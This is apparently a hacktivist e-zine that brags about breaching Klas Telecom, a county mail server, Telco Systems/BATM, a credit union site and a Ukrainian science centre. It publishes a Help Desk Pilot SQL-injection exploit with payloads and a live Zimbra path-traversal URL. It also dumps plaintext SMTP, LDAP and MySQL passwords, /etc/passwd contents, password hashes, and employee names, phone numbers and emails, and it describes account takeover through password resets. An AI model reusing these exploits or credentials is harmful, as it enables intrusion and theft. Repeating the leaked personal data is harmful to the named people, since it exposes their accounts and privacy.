www.xcg.virginia.edu www.ywlp-old.virginia.edu www.ywlp.virginia.edu wwwtest.virginia.edu xcg.virginia.edu youthviolence.edschool.virginia.edu ywlp-old.virginia.edu ywlp.edschool.virginia.edu ywlp.virginia.edu ywlp.womenscenter.virginia.edu ywlp.womenscenter.virginia.edu 
 
          cat /tmp*:
/tmp data:

*VC 5.0 *TM IBM,9115-505 *SE IBM,0306458FA *PI 000458FA *N5 911506-458FA 52A607-60092838298151351DB5510728700020041B5000200 00 0 555500000040AD 00000000 0000 *OS AIX 5.3.0.0 *FC ******** *DS System VPD *YL U9115.505.06458FA *RT VSYS *FG XXSV *BR P0 *SE 06458FA *TM 9115-505 *SU 0004AC1212AD *VK ipzSeries *FC ******** *DS CEC *YL U789F.001.AAA8848 *RT VCEN *FG XXEV *BR P0 *SE AAA8848 *TM 789F-001 *CI 9115-505 06458FA *RK 0000000000000000 *FC 789F-001 *VK ipzSeries *FC ******** *DS SYSTEM BACKPLANE *YL U789F.001.AAA8848-P1 *RT VINI *FG XXBP *CC 53B3 *SN YL10W8224009 *FN 10N6781 *PN 32N1339 *PR 2300000000000000 *HE 0001 *CT 40130202 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS ANCHOR *YL U789F.001.AAA8848-P1-C1 *RT VINI *FG XXAV *CC 52A6 *SN YL1076009283 *FN 03N5086 *PN 03N5086 *PR 8100180000000000 *HE 0010 *CT 40B40000 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *B9 43538298151351DB55105350CFE375BB77B8BBCF4D312B4729255050AECE4D32034B7CB9C95378384D33BC71D02ED0AEBB764D34E3E258C1A1CF2BEF *VK ipzSeries *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C4 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A1419 *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C6 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A152F *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C9 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A14AD *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C11 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A14AE *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS CEC OP PANEL *YL U789F.001.AAA8848-D1 *RT VINI *FG XXOP *CC 28A0 *SN YL10W819500T *FN 42R5377 *PN 10N9973 *HE 0001 *CT 40B50000 *HW 0001 *B3 000000000000 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS Voltage Reg *YL U789F.001.AAA8848-P1-C3 *RT VINI *FG XXRG *CC 6B16 *FN 24R2697 *VK RS6K *FC ******** *DS A IBM AC PS *YL U789F.001.AAA8848-E1 *RT VINI *FG XXPS *CC 51BC *SN YL10286B0076 *PN 39J5045 *FN 39J5045 *VK RS6K *FC ******** *DS A IBM AC PS *YL U789F.001.AAA8848-E2 *RT VINI *FG XXPS *CC 51BC *SN YL10286B0257 *PN 39J5045 *FN 39J5045 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A1 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A2 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A3 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A4 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS PCI BRIDGE *YL U789F.001.AAA8848-P1-C12 *RT VINI *FG XXIB *CC 271F *SN YL10W817803E *FN 03N6843 *PN 03N6843 *HE 0001 *CT 30F10005 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS PCI BRIDGE *YL U789F.001.AAA8848-P1-C13 *RT VINI *FG XXIB *CC 276F *SN YL10W8192046 *FN 03N6846 *PN 03N6846 *HE 0001 *CT 30F10005 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS System Firmware *YL U9115.505.06458FA-Y1 *CL Phyp_1 15532009040980A00701 *CL PFW 17152009030681CF0681 *CL FSP_Ker 16582009042181E00100 *CL FSP_Fil 16582009042181E00101 *CL FipS_BU 16582009042181E00200 *CL SMA 11392005070781E00500 *CL SPCN3 124620060531A0E00A11 *CL SPCN1 091620040823A0E00D00 *CL SPCN2 125920060628A0E00D20 *MI SF240_382 SF240_358 SF240_382 *FC ======== *DS IDE DVD-ROM Drive *AX cd0 *PL 05-08-00 *MF IBM *TM DROM0020561 *RL DA31 *Z0 058002028F000010 *YL U789F.001.AAA8848-P1-D3 *FC ======== *DS 16 Bit LVD SCSI Disk Drive *AX hdisk0 *PL 06-08-01-5,0 *MF IBM H0 *TM ST373455LC *FN 03N6347 *RL 43383038 *SN 0004ED3D *EC D76038 *PN 03N6346 *Z0 000004129F000136 *Z1 0913C808 *Z2 0002 *Z3 07301 *Z4 0001 *Z5 22 *Z6 D76038 *BR H0 *YL U789F.001.AAA8848-P1-T9-L5-L0 *FC ======== *DS 16 Bit LVD SCSI Disk Drive *AX hdisk1 *PL 06-08-01-8,0 *MF IBM H0 *TM ST373455LC *FN 03N6347 *RL 43383038 *SN 0004ED39 *EC D76038 *PN 03N6346 *Z0 000004129F000136 *Z1 0913C808 *Z2 0002 *Z3 07301 *Z4 0001 *Z5 22 *Z6 D76038 *BR H0 *YL U789F.001.AAA8848-P1-T9-L8-L0 *FC ======== *DS SCSI Enclosure Services Device *AX ses0 *PL 06-08-01-15,0 *MF IBM *TM VSBPD2E1 U4SCSI *RL 6781 *SN W8224009 *Z0 0D0002022F004000 *FN 10N6781 *FL P1 *FS 789F-001 AAA8848 *YL U789F.001.AAA8848-P1-T9-L15-L0 *YL U789F.001.AAA8848-P1-T9-L15-L0 


    █   █ █  █ █    ███   █████
   ███    █ █  █   █   █ █
  ██ █    ██   █   █████ █  
 ██  █    █ █  █   █   █  ████
███████   █  █ ███ █   █      █
    ██                        █
    ██  █                █████



     Klass Telecom, I know the majority of you have not heard of this Telecommunications company.. however; the reason in which we hacked them is here:

    On their website:

        Engineering is the heart of Klas Telecom. 
        With over 80% of the company’s employment dedicated to engineering, design, research and development, Klas Telecom is able to stay on the forefront of the tactical communications solutions market. 
        Our expert engineers work ceaselessly to solve the unique challenges of communicating securely in military and other austere environments. 
        They ensure that our products take advantage of emerging technology while having their base in industry standards. 
        Founded in 1991, Klas Telecom has been developing connectivity equipment for U.S. and international federal governments for over 22 years.

    On their twitter:

     Klas Telecom, founded in 1991, has been providing integrated, secure tactical communications solutions to the Department of Defense for over 12 years.

   As it says, they have been developing communication means for the U.S. And International Govt..
  Whelp, #FuckTheSystem.

    Klas Telecom had a legacy helpdesk set-up that was suppose to be limited through the .htaccess to their own ip range.
   They didn't rewrite certain things as variables in the .htaccess file; allowing everyone to view this server outside the range on the move.
   Well, we had a little Error based SQL injection 0day on helpdesk pilot just sitting around; one day, we decided to do a skim through the dork.

    One of the first things to pop up was a website called grrip.net; so, we examined it, and exploited it propperly.
   P.S: Here's the 0day, don't really need it anymore; so releasing it to the public, it's how we accessed their email.

          # Exploit Title: Help Desk Pilot 4.4.5 Error-based SQL Injection
          # Google Dork: "knowledgebase.php?act=artattach&att_id"
          # Date: 3/15/2013
          # Exploit Author: NullCrew
          # Vendor Homepage: http://www.twitter.com/NullCrew_FTS
          # Software Link: http://www.helpdeskpilot.com/
          # Version: Help Desk Pilot 4.4.5
          # Tested on: Windows, Linux

          An error based SQL Injection vulnerability lies in the knowledgebase's $_GET['att_id'] of $_GET['artattach'].
          The syntax of the vulnerability is as basic as it gets.

          The database contains mail information in the "config" table, so you might want to check that out.

          EXAMPLE: 127.0.0.1/knowledgebase.php?act=artattach&att_id=31337'
          EXAMPLE: 127.0.0.1/knowledgebase.php?act=artattach&att_id=31337 or 1 group by concat(version(),floor(rand()*2)) having min(NULL) or 1--

          Any questions can be sent to: twitter.com/NullCrew_FTS
          -------------------------------------------------------

         Now, onto Klas's email:

                   ---Email-------------------------------
                   SMTP Port: 465
                   SMTP Host: smtp.gmail.com 
                   SMTP Username: [email protected]
                   SMTP Password: Ax4JD%4Ks
                   ---End Email---------------------------

         Alright, so, our next step was decrypting the passwords; Whelp, this was taking to long.
        Considering we had access to the support desks smtp services..
        We were able to easily just go to request a new password, and boom; we had access.

        (Proof.)

        Return-Path: <[email protected]>
        Received: from grrip.net ([67.192.46.6])
        by mx.google.com with ESMTPSA id fj1sm4935014oeb.5.2014.04.02.00.01.11
        for <[email protected]>
        (version=TLSv1 cipher=RC4-SHA bits=128/128);
        Wed, 02 Apr 2014 00:01:12 -0700 (PDT)
        Date: Wed, 2 Apr 2014 02:01:11 -0500
        Return-Path: [email protected]
        To: [email protected]
        From: [email protected]
        Reply-To: [email protected]
        Subject: Your password: Login information
        Message-ID: <[email protected]>
        X-Priority: 3
        X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version 2.0.2]
        MIME-Version: 1.0
        Content-Transfer-Encoding: 8bit
        Content-Type: text/html; charset="ISO-8859-1"

        Dear Frank (No name for you.)

        We received a request to reset and send your password to your email. 

        Your password is ZTYXJDUT . 

        Use your email address and password to login to help desk interface: http://www.grrip.netindex.php .

        Regards,
        Admin

      (Another, for proof; Military email.)

        Return-Path: <[email protected]>
        Received: from grrip.net ([67.192.46.6])
        by mx.google.com with ESMTPSA id wy2sm2014265obc.21.2014.04.02.00.13.24
        for <[email protected]>
        (version=TLSv1 cipher=RC4-SHA bits=128/128);
        Wed, 02 Apr 2014 00:13:24 -0700 (PDT)
        Date: Wed, 2 Apr 2014 02:13:24 -0500
        Return-Path: [email protected]
        To: [email protected]
        From: [email protected]
        Reply-To: [email protected]
        Subject: Your password: Login information
        Message-ID: <[email protected]>
        X-Priority: 3
        X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version 2.0.2]
        MIME-Version: 1.0
        Content-Transfer-Encoding: 8bit
        Content-Type: text/html; charset="ISO-8859-1"

        Dear (No more info for you.)
        We received a request to reset and send your password to your email. 

        Your password is VAFYVPIH . 

        Use your email address and password to login to help desk interface: http://www.grrip.netindex.php .

        Regards,
        Admin

     On a side note, Klas Telecom played things smart; Their IT @cros13 was contacted after our tweet.
    They observed the servers and noticed that we have indeed achieved access; We had a conversation with this IT.
    He is the most sensibile IT that we have come across, with that we'd like to give a special shout-out to the fella, good-job, mate.


 █████  █               
█         ███ ██     █ ████   ███  ████  ██     █  ████
██████     █  █ █    █ █   █   █  █    █ █ █    █ █    █
      █    █  █  █   █ █    █  █  █    █ █  █   █ █    █
█     █    █  █   █  █ █    █  █  ██████ █   █  █ ██████ 
 █████     █  █    █ █ █   █   █  █    █ █    █ █ █    █
          ███ █     ██ ████   ███ █    █ █     ██ █    █ 

        █

   mail.tiptoncounty.In.gov - Alright, much like Comcast, and Al Arabiya; (With the exception of less servers.)
  Coming to the realization that it was running on Zimbra, and that even Comcast didn't patch..
  We decided to attempt to pull the usual LDAP and MySQL information from localconfig.xml.. It worked.

  Exploit URL (Nab it while it's hot.): http://mail.tiptoncounty.in.gov/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

     ldap port:
     a["<key"]="name=\"ldap_port\">";
     a["<value>389</value>"]="";

     Zimbra User:
     a["<key"]="name=\"zimbra_user\">";
     a["<value>zimbra</value>"]="";

     Zimbra ldap:
     a["<key"]="name=\"zimbra_ldap_password\">";
     a["<value>uL3xmqJwm</value>"]=""

     Amavis:
     a["<key"]="name=\"ldap_amavis_password\">";
     a["<value>uL3xmqJwm</value>"]="";

     Truststore:
     a["<key"]="name=\"mailboxd_truststore_password\">";
     a["<value>changeit</value>"]="";

     Keystore:
     a["<key"]="name=\"mailboxd_keystore_password\">";
     a["<value>cy2jaP5jT</value>"]="";

     Zimbra MySQL:
     a["<key"]="name=\"zimbra_mysql_password\">";
     a["<value>NgrfUQjZH4oTpW4rF7QR6N7jHwM0QGbH</value>"]="";
  
     MySQL root password:
     a["<key"]="name=\"mysql_root_password\">";
     a["<value>NKrQYWwmI8mcUKdrG0NSr7gqrQBlnun</value>"]="";

     ldap postfix:
     a["<key"]="name=\"ldap_postfix_password\">";
     a["<value>uL3xmqJwm</value>"]="";

     ldap replication:
     a["<key"]="name=\"ldap_replication_password\">";
     a["<value>uL3xmqJwm</value>"]="";

     ldap ngix:
     a["<key"]="name=\"ldap_nginx_password\">";
     a["<value>uL3xmqJwm</value>"]="";

     ldap root password:
     a["<key"]="name=\"ldap_root_password\">";
     a["<value>uL3xmqJwm</value>"]="";

     etc/passwd/:

     a.root="x:0:0:root:/root:/bin/bash";
     a.daemon="x:1:1:daemon:/usr/sbin:/bin/sh";
     a.bin="x:2:2:bin:/bin:/bin/sh";
     a.sys="x:3:3:sys:/dev:/bin/sh";
     a.sync="x:4:65534:sync:/bin:/bin/sync";
     a.games="x:5:60:games:/usr/games:/bin/sh";
     a.man="x:6:12:man:/var/cache/man:/bin/sh";
     a.lp="x:7:7:lp:/var/spool/lpd:/bin/sh";
     a.mail="x:8:8:mail:/var/mail:/bin/sh";
     a.news="x:9:9:news:/var/spool/news:/bin/sh";
     a.proxy="x:13:13:proxy:/bin:/bin/sh";
     a["www-data"]="x:33:33:www-data:/var/www:/bin/sh";
     a.backup="x:34:34:backup:/var/backups:/bin/sh";
     a.list="x:38:38:Mailing List Manager:/var/list:/bin/sh";
     a.irc="x:39:39:ircd:/var/run/ircd:/bin/sh";
     a.gnats="x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh";
     a.nobody="x:65534:65534:nobody:/nonexistent:/bin/sh";
     a.libuuid="x:100:101::/var/lib/libuuid:/bin/sh";
     a.dhcp="x:101:102::/nonexistent:/bin/false";
     a.syslog="x:102:103::/home/syslog:/bin/false";
     a.klog="x:103:104::/home/klog:/bin/false";
     a.bind="x:104:111::/var/cache/bind:/bin/false";
     a.sshd="x:105:65534::/var/run/sshd:/usr/sbin/nologin";
     a.dave="x:1000:1000:Dave,,,:/home/dave:/bin/bash";
     a.zimbra="x:1001:1001::/opt/zimbra:/bin/bash";
     a.postfix="x:1002:1002::/opt/zimbra/postfix:/bin/sh";
     a.clamav="x:106:115::/var/lib/clamav:/bin/false";


  █████   █    ███████  ██████  █       ███████    ███████
 ██    █          █     █       █       █         █       █
 █                █     █       █       █        █         █
 █ ████           █     █████   █       █        █         █ & BATM
 ██   ██          █     █       █       █        █         █
 █     ██         █     █       █       █         █       █
 ██     █         █     ██████  ██████  ███████    ███████
  ██   █
   ████   █
                
       Founded in 1972 and based in Mansfield, Massachusetts, Telco Systems designs, develops and markets edge telecom network solutions which enable service providers to create an intelligent end-to-end Carrier Ethernet/MPLS network. 
     Telco Systems solutions focused around four primary vertical markets - carrier cloud networking and cloud services, business Ethernet services, mobile backhaul [1] and AdvancedTCA (ATCA) switching blades.

      Sorry guise, but, as this e-zine is obviously proving? You all fucking suck, heavily; At most things.
     Especially securing your system, which as a company providing these types of things? It should be secured, and constantly patched.
     But, nooooooo, go figure; you guise suck, and this is what happens when the aliens of NC drop by to pay ya a visit!

      Let's see here, it couldn't be that all your backups are belong to us, or anything, right?
       When you download the contents below at the end of the zine; you will be downloading three sql dbs from telco as well.

      Proof before download:

INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES 
	('1', 'admin', '$P$BLkCcV81SBWzPRWAeH7HPrR363nJEt.', 'admin', '[email protected]', 'http://www.telco.com', '2012-02-13 17:04:28', '', '0', 'Masha Zabaruk')
	,('3', 'Nir Halachmi', '$P$Blg3v43rX0BhNeOdi2P7CwppiEa6ay0', 'nir-halachmi', '[email protected]', '', '2012-02-13 17:10:29', '', '0', 'Nir Halachmi')
	,('4', 'Irit Gillath', '$P$BbXlrDdc7dWRW.1IJ9FnaF1HCsvRm50', 'irit-gillath', '[email protected]', '', '2012-02-13 17:10:29', '', '0', 'Irit Gillath')
	,('5', 'Aviv Miller', '$P$BdtfN80AaBQe/dC7NE6LdTzplypyh./', 'aviv-miller', '[email protected]', '', '2012-02-13 17:10:29', '', '0', 'Aviv Miller')
	,('12', 'ggum', '$P$B8sAOSjrXs0GzZsJuquhsh.XUd2qEJ1', 'ggum', '[email protected]', '', '2013-01-30 04:26:20', '', '0', 'Greg Gum')
	,('7', 'motin', '$P$Bw3zlfRilcDRFNtQL80OJOGPRBQY5f.', 'motin', '[email protected]', 'http://www.telco.com', '2013-01-25 18:02:35', '', '0', 'Moti Nisim')
	,('14', 'moshe-shimon', '$P$BnoP504/znW8JF37wnMU6OZdE1Lbam.', 'moshe-shimon', '[email protected]', 'http://www.telco.com', '2013-01-30 18:00:42', '', '0', 'Moshe Shimon')
	,('15', 'taylor-salman', '$P$B.Rp3ZEMeiVk5QIlSPXc3KCMvD2dF6/', 'taylor-salman', '[email protected]', 'http://www.telco.com', '2013-01-30 18:02:12', '', '0', 'Taylor Salman');


INSERT INTO `operators` (`opID`, `refwhen`, `opName`, `opUsername`, `opPassword`, `opIP`, `opCompany`, `opDesc`, `opPhone`, `opEmail`, `opRole`, `opAutologout`, `active`) VALUES 
	('1', '0000-00-00 00:00:00', 'Nikolay Hristov', 'blake', '962da309e5db8119b6bda644ec7b1aa0043435b8', '', 'Alienlab', 'Web Developer', '+359 888 893824', '[email protected]', '1', '0', '1')
	,('2', '2012-01-13 09:05:55', 'Masha Zabaruk', 'masha', '582a2631523e07b219826a048be997ca2c6773c7', '', 'Telco Systems USA', '', '', '[email protected]', '1', '0', '1')
	,('3', '2012-10-23 12:54:49', 'Vicki Kobza', 'vicki', '923040f705b4ddfbbaee2ca2024409b4fdf1cf76', '', 'Telco Systems', '', '', '', '1', '0', '0');

INSERT INTO `operators` (`opID`, `opSupportAdmin`, `refwhen`, `opName`, `opUsername`, `opPassword`, `opIP`, `opCompany`, `opDesc`, `opPhone`, `opEmail`, `opRole`, `opZones`, `opAutologout`, `creator`, `active`) VALUES 
	('1', '0', '0000-00-00 00:00:00', 'Nikolay Hristov', 'blake', '962da309e5db8119b6bda644ec7b1aa0043435b8', '', 'Alienlab', 'Web Developer', '+359 888 893824', '[email protected]', '1', '', '0', '1', '1')
	,('2', '0', '2012-01-13 09:05:55', 'Masha Zabaruk', 'masha', '75e000964285acd468ed63c2bf09f10c0e1d6bab', '', 'Telco Systems USA', '', '', '[email protected]', '1', '', '0', '1', '1')
	,('10', '0', '2012-11-28 09:40:21', 'Tester Tester', 'tester', '399e34b6bd6610702d655a5e8654e7b207dbd1ef', '', '', '', '', '', '1', '', '0', '1', '1')
	,('4', '1', '2012-05-14 11:16:32', 'Momchil Boychev', 'momchil', '3025b2294d44426f4c3b7721103c613352148d4f', '', 'Telco Systems BG', '', '', '[email protected]', '2', '1345678', '0', '1', '1')
	,('5', '0', '2012-08-09 01:42:55', 'Irit Gillath', 'irit', '864d7f6d52e1b7084ccdfe7504aa280510ea8a75', '', '', '', '', '', '2', '', '0', '1', '1')
	,('6', '1', '2012-08-27 09:08:03', 'Yoni Nabedrick', 'Yoni', '88a638243d2b7241c9115e2ae6bb5fd250ae8037', '', 'Telco Systems IL', 'PS Engineer', '', '', '2', '14', '0', '3', '1')
	,('7', '1', '2012-09-03 07:04:36', 'Yossi Gilany', 'ygilany', '2c47e236d897ff313dd6d8024ae18b3405ff1167', '', 'Telco Systems IL', 'PS Director', '', '[email protected]', '2', '1345678', '0', '3', '1')
	,('8', '1', '2012-09-03 07:08:02', 'Zwi Walerstein', 'ZwiW', '7be4402c10847923e7998b4b5c5cd29747b4a695', '', 'Telco Systems IL', 'GM', '', '', '2', '134', '0', '7', '0')
	,('9', '1', '2012-09-19 10:18:53', 'Telco marketing', 'telco', 'c0533c6c1e9e60e75b2de0719c075a51d83a7b54', '', '', '', '', '', '2', '123', '0', '1', '1')
	,('13', '1', '2012-12-18 10:35:59', 'Telco PLM Test admin', 'plm', 'fde1150d18147d27c90148ed6bff32d7faf4c318', '', 'Telco Systems', '', '', '', '2', '1345678', '0', '1', '1')
	,('14', '1', '2013-01-07 15:06:15', 'Smita Pande', 'spande', '632f92623a3c512d7ef7a01698dca536f85b39ff', '', 'Telco Systems', 'Professional Services Engineer', '', '[email protected]', '2', '12345678', '0', '2', '1')
	,('15', '1', '2013-01-07 15:18:46', 'Deyan Dichev', 'ddichev', 'f89a3539c1466c3154719b765b3ca051cb638633', '', '', 'PS Engineer', '+1 781 255 2550', '[email protected]', '2', '12345678', '0', '2', '1')
	,('16', '1', '2013-01-07 15:46:18', 'Jeffrey Richard', 'jrichard', 'ea2a827dd822a188bf2cbc8fa4eef14ec595d870', '', 'Telco Legacy Division', 'Technical Support Engineer\r\nTelco Legacy Division', '781-255-2495', '[email protected]', '2', '12345678', '0', '2', '1')
	,('19', '0', '2013-01-08 04:13:06', 'Daniela Dankova', 'dani', 'c1de93ce16028a61f4e71c3430e911f82c23e0ca', '', 'Telco Systems BG', 'Tech Writer', '', '[email protected]', '1', '', '0', '1', '1')
	,('25', '1', '2013-01-17 09:27:34', 'INSIDE SALES', 'inside_sale', '936215472726262a68bb1652b3b794b23763b63f', '', 'TELCO SYSTEMS', 'This is for Gale & Erin for Inside Sales', '', '[email protected]', '3', '12', '0', '14', '1')
	,('18', '1', '2013-01-07 16:43:50', 'Dave Lee', 'dlee', '35462c4fc4f343a1c2cfb13b6a08132cb6aae231', '', 'Telco Legacy Division', 'V.P. Business Development', '', '[email protected]', '2', '12345678', '0', '2', '1')
	,('20', '1', '2013-01-08 04:23:04', 'Nadine Dove', 'nadine', '9e6939b5e640b29edf543064fef1fff40062a11c', '', 'Telco Systems IL', '', '', '[email protected]', '2', '1', '0', '1', '1')
	,('21', '1', '2013-01-08 04:25:11', 'Moshe Haimov', 'haimov', 'f7d8131aba4ddccb62722702762f0d11eafd3b31', '', 'Telco Systems IL', '', '', '[email protected]', '2', '1', '0', '1', '1')
	,('32', '1', '2013-02-01 08:46:13', 'Gast?n Cutignola', 'gcutignola', '', '', 'Telco Systems', 'SE, Latin America\r\n\r\nPassword - access4telco', '', '[email protected]', '3', '12345678', '0', '15', '1')
	,('24', '1', '2013-01-11 10:24:56', 'Blake Test', 'blaketest', '6e5e5df8d1574e60a976d8e5551879eaa35dd1a2', '', '', '', '', '', '2', '1345678', '0', '19', '1')
	,('23', '1', '2013-01-10 12:14:53', 'Paul Schilling', 'pschilling', '366feae8e049672053e0428ae85506243068b148', '', 'Telco Legacy Division', 'Technical Support Engineer\r\nTelco Legacy Division', '781-255-5214', '[email protected]', '2', '12', '0', '17', '1')
	,('26', '1', '2013-01-24 06:51:05', 'Markus Pestinger', 'markus', 'cd01a82a5a2fa78f71bdb1b454a403fcf14f8244', '', 'Telco Systems', 'SE EMEA', '', '', '3', '12345678', '0', '19', '1')
	,('27', '1', '2013-01-24 06:53:20', 'Derek Wang', 'derek', '41284decb53556cf2919383e0b073ce0fcace300', '', 'Telco Systems', 'SE APAC', '', '', '3', '12345678', '0', '19', '1')
	,('28', '1', '2013-01-24 06:55:57', 'Daniel Bravarnik', 'daniel', 'daaaa0e7471062a330ceb2ec876c418807fd927c', '', 'Telco Systems', 'SE North America', '', '', '3', '12345678', '0', '19', '1')
	,('33', '1', '2013-02-04 15:20:23', 'Bob St. Hilaire', 'bobsthilaire', 'bdd761f29af1f28fc9b2c487f1d7df0d5b345f82', '', 'Telco Systems', 'Operations.', '781-255-2291', '[email protected]', '3', '12', '0', '15', '1')
	,('30', '1', '2013-01-24 07:01:55', 'Pasquale Tagliarini', 'pasquale', '5769965bd169aac9c3da65d5630278785460880f', '', 'Telco Systems', 'SE North America', '', '', '3', '12345678', '0', '19', '1')
	,('31', '1', '2013-01-24 07:02:53', 'Salah Chaou', 'salah', 'e35a40146c853b582f5ba1849d5183602fa3c58f', '', 'Telco Systems', 'SE North America', '', '', '3', '12345678', '0', '19', '1')
	,('34', '1', '2013-02-04 17:39:45', 'Telco Inside sales', 'telco_insidesale', '3d2c209c673d1d29d21d3dec5bb65e562ee907cb', '', 'Telco Systems', 'Used for inside sales by Gail and Erin', '', '', '3', '12', '0', '15', '1')
	,('35', '0', '2013-02-07 10:56:29', 'Meira Shitrit', 'meira', '7f371cf75994b38200ed90c9aa867bcad4aa4166', '', 'Telco Systems', 'Quality Assurance Manager', '', '[email protected]', '2', '', '0', '2', '1')
	,('36', '1', '2013-02-12 06:56:47', 'Moshe Digmal', 'mdigmal', 'ee65fd9303075a30217663367ee54a9daaf62e54', '', 'Telco', '', '', '[email protected]', '3', '1345678', '0', '1', '1')
	,('37', '1', '2013-03-04 03:06:09', 'Meira Zitelbach Shitrit', 'meiraz', '006b3ed87b75ab8dcadf089e7b5a5d6d1d4cab10', '', 'Telco Systems IL', '', '', '', '2', '1345678', '0', '1', '1');



      BOUSBONUSBONUSBONUSBONUS!
     oKAY, WE GET IT; WHAT THE FUCK DO YOU WANT!?

      BATM, GIMME THEIR SHIT PL0X!
     You mean the company that owns Telco Systems?

      YES, YOU GIMME THAT SHIT; NOW!
     You're in luck, they're vulnerable to the same thing!

      OM NOM NOM NOM NOM NOM NOM NOM NOM
      OM NOM NOM NOM NOM NOM NOM NOM NOM
 
      BATM OPERATORS:
      blake:962da309e5db8119b6bda644ec7b1aa0043435b8:Nikolay Hristov:+359 888 893824
      maria:da1a1dee1cf51e12e41346dde66761a1e0c63223:Maria Nissan
      masha:582a2631523e07b219826a048be997ca2c6773c7:Masha Zabaruk 



  █████ █  █████  ████  █████ █████   ████  █████  ████  █       ████  ███  █████    █ █████ ███████   █   █ ████ █████  ████  ████
      █    █   █ █    █   █     █    █    █ █   █ █    █ █       █     █  █ █        █   █      █      █   █ █  █   █   █    █ █  █
      █    █   █ ██████   █     █    █    █ █   █ ██████ █       █     █    ████   ███   █      █      █   █ █  █   █   █    █ █  █
      █    █   █ █    █   █     █    █    █ █   █ █    █ █       █     █    █     █  █   █      █      █   █ █  █   █   █    █ █  █
      █ █  █   █ █    █   █   █████   ████  █   █ █    █ ████    ████  █    █████  ███ █████    █      █████ █  █ █████  ████  █  █

    Yes, you read it right; and the funniest part about it? It was a simple hack, sql injection:
   See for yourself: http://www.creditunion.coop/news/story.php?id=64362

    Now, of course; This doesn't mean we jacked any cash, or changed anyones credit scores..
   But it does show that simplicity goes a far way; now, here is a sample of the type of data in the download for it:

         WP-USERS
         username, password, email, activation key.

         admin:$P$93jtG7JJBnfik1bFn2k.kZnjNajan71:[email protected]:X#%2)WrzV&lv
         dklavitter:$P$9N6xDuhX39BXu1tMArNjBNJUZaVT2z1:[email protected]:D6V5z%**F$jb

         CMS

         name, pass, mail, access, login

         [email protected]:f3ca0f3d5e820fe1d583a0d2208f5faf:[email protected]:1290442727:1290442338
         [email protected]:e66c39419b0b20ea68efbb4da1a56b25:[email protected]:1363092146:1363091481
         balderson:2eef47909b32eaef01cb90d365c7d185:[email protected]:1360090372:1360090123
         [email protected]:161ebd7d45089b3446ee4e0d86dbcf92:[email protected]:1287568255:1287567724
         [email protected]:b43190eb1b7f95cff61014b5d1480ee5:[email protected]:1363043662:1363042929
         [email protected]:1c8e3b2667c775961b06e5c023a30cea:[email protected]:1341492658:1341492658
         [email protected]:161ebd7d45089b3446ee4e0d86dbcf92:[email protected]:1288308848:1288308590
         [email protected]:c4a83adf116cc666d9d544ad05f5f14e:[email protected]:1351169586:1350935156


  █████  █   ████  ███████  ████  █   █
  █   █     █    █    █    █    █ █   █
  █   █     █         █    █      █   █
   ███       ████     █    █      █   █ - Science and Technology center in Ukraine.
  █   █          █    █    █      █   █
  █   █     █    █    █    █    █ █   █
  █████  █   ████     █     ████   ███


     Well now, this one was interesting; The Science and Technology Center in Ukraine?
    First thing is first, they claimed that they weren't logging user ip-addresses, or other things.
    So, naturally, we decided to look into the claim and began goofing around.

     By the time we came across an exploit in stcu.int, we managed to obtain something interesting.. their smtp configuration:

	SMTP configuration:

	function authgMail($from, $namefrom, $to, $nameto, $subject, $message, $custom_header = "")

	{

/*  your configuration here  */

//$smtpServer = "sslv3://smtp.gmail.com";
	 //does not accept STARTTLS
$smtpServer = "tls://smtp.gmail.com"; 
	//does not accept STARTTLS
$port = "465"; // try 587 if this fails
$timeout = "60"; 
	//typical timeout. try 45 for slow servers
$username = "[email protected]"; 
	//your gmail account
$password = "G46572"; 
	//the pass for your gmail
//$password = "NetskY";
$localhost = $_SERVER['REMOTE_ADDR']; 
	//requires a real ip
$newLine = "\r\n"; //var just for newlines
 

	From the email, we were able to reset the passwords of accounts belonging to the STCU & Funding parties project management login

		Return-Path: <[email protected]>
		Received: from [212.109.57.173] (xserve.stcu.int. [212.109.57.173])
       		by mx.google.com with SMTP id 45sm17755596eeh.9.2014.04.11.06.38.21
        	for <[email protected]>
        	(version=TLSv1 cipher=RC4-SHA bits=128/128);
       		Fri, 11 Apr 2014 06:38:22 -0700 (PDT)
		Return-Path: <[email protected]>
		To: [email protected]
		From: STCU Webmaster <[email protected]>
		Reply-To: STCU Webmaster <[email protected]>
		Subject: New Password
		Date: Fri, 11 Apr 2014 16:40:32 +0300
